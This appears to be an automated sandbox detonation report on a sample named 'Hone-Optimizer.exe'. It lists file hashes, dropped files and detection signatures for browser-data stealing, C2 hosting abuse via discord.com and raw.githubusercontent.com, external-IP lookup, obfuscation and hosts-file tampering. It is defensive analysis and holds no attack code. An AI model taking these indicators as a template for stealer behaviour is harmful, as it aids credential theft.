SHA256 1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc
SHA512 907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce

memory/3632-113-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60b3262c3163ee3d466199160b9ed07d
SHA1 994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256 e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512 081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

memory/3632-119-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26c94c408a5a2e1e04f1191fc2902d3e
SHA1 ce50b153be03511bd62a477abf71a7e9f94e68a5
SHA256 86ad00a425874b935cc725f83780add09d08d7dc9cbfb705821955fe937c05ec
SHA512 70e7bc620b369d7d0fcf06f93da000819bf089a502f1014641ad14d56ead22f31c25b97363296fd3749c63bde6db3bf115b33504b160485d792e1331c337b586

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline

MD5 764451175596617f43b983f3b182e5d2
SHA1 55e712b30dfa54bb7be29f48c0d54d5f028db638
SHA256 9a23c3305c1a3a49f405562f4e8d1a7a7d3c3293ed99bf5112aa7cc3ddb9cc27
SHA512 731a41ea6c990617d9b00a39fdbe7aff087f87e1218504be8c095f03c4dc3ca1f5a3a22813a43ba15913f2b697cb8e9ab3efb4d07ef3cdf832e41a71dcf34bca

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP

MD5 a1c249151a44cc17347237f473fe4f1c
SHA1 3b7ed804b77a6c71db6baad242e46f64ad507aaa
SHA256 878cad96affd0dd7fe545fc3e6e7a9620e531d58e9482998d668dc950a1dab11
SHA512 3beec7f14b06f797ab500261fbcf8ba2f7169ad1f0d384253ca9b3a42b139cfbb6f117d7baea9ecbbf8df039516ecf69e6b8a39babc3da837e9a4e927603507a

C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp

MD5 91fdf5634fb49ef536cd37c68b15204a
SHA1 ce0b52f9bc70d77fc88d47a33ac2f7477d4e70d7
SHA256 a9e13ba62329d21565bae0cd8bef7d6687f1a22c31cf303ccf4c1ea7b7741cf9
SHA512 fd694659f6b20ff131ed86469638de01c0fc35046c0091f11ff678c7dc949d014efc6d62db09d18b057a244b4c8db3d08c370bc34cf76b8d6afbdc1eed5dbaf9

C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.dll

MD5 0fde815d028933727e83eb7c8336729e
SHA1 aef056e5e8cee3dfbe3c50f8ac2086713f618bd4
SHA256 29549d3b2c8a3fb13686e4d33ae83f6030028969916718117ee076b2600c8e96
SHA512 ef81435bdd352eddd5675c57f66e5cecec3ac102f6c7bbb282339788d2be6f9d8258a599cb869c1f93b4021fd70b706206b94e2e3a2c93f3d103d2d75006573b

memory/1220-183-0x0000019225140000-0x0000019225148000-memory.dmp

memory/3632-199-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d7b1fea485b8fe137f481fa06951a87
SHA1 260e7a8e4ed9b37a863e7e48072567a39c3c900c
SHA256 0e15bd8c72633bfea5211707f3db56a292e29431345aea123bd9f3c7e502b42f
SHA512 cb67f71e64543423f58b99451f09f8cc64e5114df7f2ed92be4eb568a8021a9ecf046e551ef22a655dea4d47b5adeb874d1be9d583030d504e918ddde7c66bb5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e1fdd1b66d2fee9f6a052524d4ddca5
SHA1 0a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA256 4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA512 5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

memory/3632-238-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

memory/3632-239-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\ApproveGroup.xlsx

MD5 b71ac26955cfd2794b7790778093aceb
SHA1 d45882428f419c0b440c03e7a28e8ea95c03cdd9
SHA256 a7c15b34c1afcdd4d622d301c20368fc438688b8d239dd4c714f073652c1c99e
SHA512 9d6bcea54ee0e4d0bcf0275a9623eae95bbdc1e4b1dd674405260aefcdc6f039f0bec4864bc5caf54177353d2ccb262e3a2372f51cb8cdfbfbda6d3994310df1

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\CompressRedo.xlsx

MD5 77bb776232816faa93052342f21489c0
SHA1 3bd6ea44620c62eae227790d02d76005c9fd118b
SHA256 6d000723fcfcc2a9da9554841ac257e076a79d3f550a9d376f430a671a740d14
SHA512 a762011b77a28d8f611882d12a9758e8733bdf520305e517984fff276486f81615ee142450d8fd892b6890ebd432f4d34389f77d580bfef116665a626b99d1da

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\PublishShow.docx

MD5 88d9cd5f0c5bf88526f8943bce0b32bd
SHA1 16d58ed6226a2fcdab3c41fe4e3d58871b05a131
SHA256 146549438b121be396fb2f18760196561a514d9407fe1a538caced8ab9a1720d
SHA512 59847d34e836e03ce76ec54f8e6b4d936614cceed557c9841deb7c8b3c09e1d0e33005caa406115f1354f84c3c1a69dda341d27e6488f11954b3aaa7179df7df

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\HideSave.docx

MD5 b23c0c501dfd49c39b8a158658c9de76
SHA1 3f333eff9005d66574db2cac161d6d4ec1f1d395
SHA256 c13f486d9d45afc6e342fbbcaf97f0ca4c777b795b6d485dbee1dadc4e270a99
SHA512 e7ae0b215d8c782497f6ddb06d86d6638a361adef2a2a29f92c7f2f9efe0eb4307f7ff95cc5ccd4cadfb13dd78d1bdfabbf396a83bddbcbc58cac769bb727d93

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\SkipSet.docx

MD5 207dda302ac10a56baea60fb711be19d
SHA1 fede41bfef029b3d2f1e9b3693d2b9ff6f173440
SHA256 f498bbb3b71bef839647fe7e99a900147aad882827e1f87e38d599717f23ebce
SHA512 8e9cfea08899a2333f6f4df3c73e72162b6e88bb8d253391e5ec049bef2387e2231c961a72be25793ebeb56fab09356ec71491c39045ed0f7247d05422ff9692

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\SplitUse.xls

MD5 0e94f365847ed174b1d279c30ce93d79
SHA1 eef20652624960061663aa4998e020353cf27a5e
SHA256 2a3bf98554b3f749fea140b82f8faebbe4479216cc892a7bd199a84b2a2d99b6
SHA512 6dd49f7241c49a3353333a0a20dcd90798b74991ea16f834b7f94f430fb99791dd0f8c3337b6e3137ada7014c87e574e404a0539fae3fc4dff260b0aba0dc6a1

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\AddMerge.mp3

MD5 8ee839b57567fec88b03929d0074aa6f
SHA1 5ff68ff3d2b5ebd6ed8ffaf054d25b8a42347eb3
SHA256 b56337a303413a90e9eebd9cb4e7d3d7c500d7bd9e09af099f333f34366c9b12
SHA512 6a8f29738d634fe8ac5ead2c9a9bf5a2ff4d426205d56a6d23f926be696a3dfd7239e83bbadca09ebbd52b73b8a928dbba0bcc413c2dca8b3c7de01a68616655

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\BackupDisconnect.ocx

MD5 ec3c3bcd86266e5a9dc286032b0046f3
SHA1 31205b539bacbfe684b799c2fc3c89497d4d706d
SHA256 65de26b2c5e000547c11d0d64f87afbce00ffa6e7f858ce0c96ce4b53973ce5d
SHA512 5632408912919a900be629ce7838c9610cfd7c5bbbb47be4a3a6325a0ac720bfdcd1d4a181c3fa2c0824bb5feb37a022836de7f5eec2b9a9e913d9a6a3b5235c

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\RepairApprove.pdf

MD5 bc38348960550c99d68b15ac3253fd6d
SHA1 a78d5ebb673465830ad06720dd54739b013d44ce
SHA256 8d080b786caf9b36fadaef9063d36885fdebc5c1b8222a84582bb45722002302
SHA512 a0dd71248af3e4cbf4987bcafd7bd04a9a34249dcc7731ad344f00adcf03cd0ec620717a20a0b9aad02ce858f62d59075ff1fe5983e919500b3ccd74c58dac1b

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\ResolveSwitch.docx

MD5 33c4c952892f6fd578b9c8b4f9779271
SHA1 a2ce70b65f1e3599d84f5479f0860bc2753704b5
SHA256 4623c39393fda37e18041c7124487447975d56735dbcd78ba019fec2ebede8d1
SHA512 b60e6368d89f6bc5e8c399ae8f905f2893c24987543c2bcf3a3a5012fb34ac58d23aeeed08e9504fac20851e695bd67a8e221ae93965ace6c88fde35d2453214

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\WaitDismount.docx

MD5 acefb00c59c3252a8a702121cd7f426d
SHA1 0bb216020e4c1ba462f15629d219d5963fe15902
SHA256 6799b938c02e5c781c8d6363ee94a739132627c663734b75a17ac69107834ddc
SHA512 5c2a5ce3d4a0ccfe94a8f9d1d62de0d26273c0e1265a9325618f7a1efa9cd0d27834680332c6bb7002125c5ad0c9e0eefea91dfcf5663edf15d3eb5ea6ee5254

memory/3632-256-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-262-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

memory/3632-257-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/4432-281-0x000001BBF6150000-0x000001BBF636D000-memory.dmp

memory/3632-312-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

memory/3632-318-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

memory/3632-317-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

memory/3632-316-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

memory/3632-315-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp

memory/3632-314-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

memory/3632-313-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

memory/3632-311-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp

memory/3632-310-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp

memory/3632-309-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp

memory/3632-308-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/3632-307-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-306-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp

memory/3632-305-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp

memory/3632-304-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp

C:\Windows\Logs\DISM\dism.log

MD5 3516b679779fb751a5b99ec1e2ac47aa
SHA1 2d0666acf799dbe2010bac34f485f62cd2f54c1b
SHA256 5b63f7dea0f62243e2336135a409f5a791d23673cc6fd1b3e9ab467797fdf6b4
SHA512 7edc5688ebc5bf917332c7a74a4fc77b1f22a7549260835e94a9922c8a8a85b29176833844dec4bc80aacc0b4c6811ee439f7f67485889209a5c98ed2c9fc0bd

C:\Users\Admin\AppData\Local\Temp\REG53B.tmp

MD5 d9d87947864e599c0c9e561743f727b5
SHA1 c35191953263416c1a3f72169a80e34d3c9bf41f
SHA256 765bc555c9c31b1500ef267138fe2d120ebc39fa855dfbf9da6b4a65b6f7578d
SHA512 b6f52c644522ab995d0d882704f874ea3c7eb05fd494c497411ac57ee421af6ed9eaf727ae8b0a87c553cebf616a856e97e0508b8482a532ab64bba7e8949066

memory/2640-364-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

memory/2640-365-0x00000000054A0000-0x00000000054BA000-memory.dmp

memory/1900-405-0x0000000004880000-0x0000000004881000-memory.dmp

memory/2660-421-0x000002A528DA0000-0x000002A528DC0000-memory.dmp

memory/2660-439-0x000002A528DC0000-0x000002A528DE0000-memory.dmp

memory/2660-438-0x000002A528DE0000-0x000002A528E00000-memory.dmp

memory/2660-455-0x000002A53B8D0000-0x000002A53B9D0000-memory.dmp

memory/4232-505-0x0000000002B40000-0x0000000002B41000-memory.dmp

memory/2288-522-0x00000270EFDD0000-0x00000270EFDF0000-memory.dmp

memory/2288-540-0x00000270F0400000-0x00000270F0420000-memory.dmp

memory/2288-539-0x00000270F0420000-0x00000270F0440000-memory.dmp

memory/2288-554-0x00000270F3810000-0x00000270F3910000-memory.dmp

memory/3180-605-0x0000000004560000-0x0000000004561000-memory.dmp

memory/3548-607-0x000002AB42900000-0x000002AB42A00000-memory.dmp

memory/3548-632-0x000002B344C70000-0x000002B344C90000-memory.dmp

memory/3548-630-0x000002B344C90000-0x000002B344CB0000-memory.dmp

memory/3548-621-0x000002B344C50000-0x000002B344C70000-memory.dmp

memory/3548-654-0x000002B358360000-0x000002B358460000-memory.dmp

memory/3348-705-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

memory/2492-706-0x000002A972140000-0x000002A972240000-memory.dmp

memory/2492-707-0x000002A972140000-0x000002A972240000-memory.dmp

memory/2492-728-0x000002A973640000-0x000002A973660000-memory.dmp

memory/2492-739-0x000002A973660000-0x000002A973680000-memory.dmp

memory/2492-738-0x000002A973680000-0x000002A9736A0000-memory.dmp

memory/2492-753-0x000002A975CD0000-0x000002A975DD0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NUNBTRQ\microsoft.windows[1].xml

MD5 d6c1b4bb94dc9522fb7c83c87ea5d841
SHA1 19ea83a7d4fe8b02f285c684bdb48727c97e9196
SHA256 f1551216ac0ba29d3b3ad772ff70fd8baa6ca6194df69d51248e425884027608
SHA512 05b9aaf43e5464d43f8b4baf7ba913f0a87b5c5adc5c5a8c865982fa341380542fc6c6dd6953bdfd826dfd0cba7db120be206730cead002dcb1b743c80cf4e34

memory/4864-806-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

memory/1200-809-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-810-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-808-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-841-0x0000017C0A400000-0x0000017C0A420000-memory.dmp

memory/1200-840-0x0000017C0A6F0000-0x0000017C0A710000-memory.dmp

memory/1200-823-0x0000017C0A1D0000-0x0000017C0A1F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 11:53

Reported

2024-11-14 11:59

Platform

win11-20241007-en

Max time kernel

334s

Max time network

337s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Windows\system32\Dism.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002fc80c284bade0450000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002fc80c280000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809002fc80c28000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d2fc80c28000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002fc80c2800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
